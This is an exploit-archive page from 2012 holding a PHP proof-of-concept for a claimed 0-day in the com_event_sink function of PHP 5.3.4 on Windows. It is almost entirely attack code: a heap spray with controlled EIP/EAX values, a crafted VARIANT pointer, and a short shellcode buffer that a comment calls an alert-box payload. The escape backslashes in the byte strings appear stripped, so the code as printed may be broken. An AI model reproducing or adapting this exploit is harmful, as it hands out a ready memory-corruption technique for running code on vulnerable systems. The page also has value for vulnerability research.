Home / exploits PHP 5.3.4 com_event_sink 0-Day
Posted on 10 October 2012
<?php //PHP 5.3.4 // //$eip ="x44x43x42x41"; $eip= "x4bxe8x57x78"; $eax ="x80x01x8dx04"; $deodrant=""; $axespray = str_repeat($eip.$eax,0x80); //048d0190 echo strlen($axespray); echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day " ; echo "By Rahul Sasi : http://twitter.com/fb1h2s " ; echo "Exploit Tested on: Microsoft XP Pro 2002 SP2 " ; echo "More Details Here: http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/ " ; //19200 ==4B32 4b00 for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++) { $deodrant.=$axespray; } $terminate = "T"; $u[] =$deodrant; $r[] =$deodrant.$terminate; $a[] =$deodrant.$terminate; $s[] =$deodrant.$terminate; //$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll $vVar = new VARIANT(0x048d0000+180); //alert box Shellcode $buffer = "x90x90x90". "xB9x38xDDx82x7Cx33xC0xBB". "xD8x0Ax86x7Cx51x50xFFxd3"; $var2 = new VARIANT(0x41414242); com_event_sink($vVar,$var2,$buffer); ?>
